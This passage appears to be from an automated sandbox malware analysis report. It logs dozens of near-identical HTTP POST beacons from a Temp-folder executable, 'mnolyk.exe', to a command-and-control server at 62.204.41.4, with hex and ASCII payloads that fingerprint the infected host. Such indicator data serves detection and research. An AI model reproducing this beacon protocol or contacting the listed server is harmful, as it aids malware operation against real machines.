                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      457192.168.2.75015262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:04.274600029 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.338808060 CET572INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      458192.168.2.75015362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:04.508858919 CET573OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.573116064 CET573INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      459192.168.2.75015462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:04.744163036 CET574OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:04.807847977 CET574INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      46192.168.2.74974062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:12.735379934 CET150OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:12.798036098 CET150INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      460192.168.2.75015562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:04.977917910 CET575OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.042330980 CET575INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      461192.168.2.75015662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:05.211996078 CET576OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.274806023 CET576INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      462192.168.2.75015762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:05.447047949 CET577OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.510445118 CET577INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      463192.168.2.75015862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:05.696445942 CET578OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.761662006 CET578INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      464192.168.2.75015962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:05.933299065 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:05.999583960 CET579INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      465192.168.2.75016062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:06.194715977 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:06.257397890 CET580INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      466192.168.2.75016162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:06.445123911 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:06.509118080 CET581INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      467192.168.2.75016262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:06.685785055 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:06.750828028 CET582INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      468192.168.2.75016362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:06.937702894 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:07.000040054 CET583INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      469192.168.2.75016462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:07.186121941 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:07.250969887 CET584INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      47192.168.2.74974162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:12.972312927 CET151OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.038661957 CET151INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      470192.168.2.75016562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:07.791157007 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:07.854868889 CET585INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      471192.168.2.75016662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:08.121536016 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:08.184685946 CET586INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      472192.168.2.75016762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:08.918958902 CET587OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:08.983628035 CET587INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      473192.168.2.75016862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:09.197665930 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:09.261853933 CET588INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      474192.168.2.75016962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:10.009649038 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
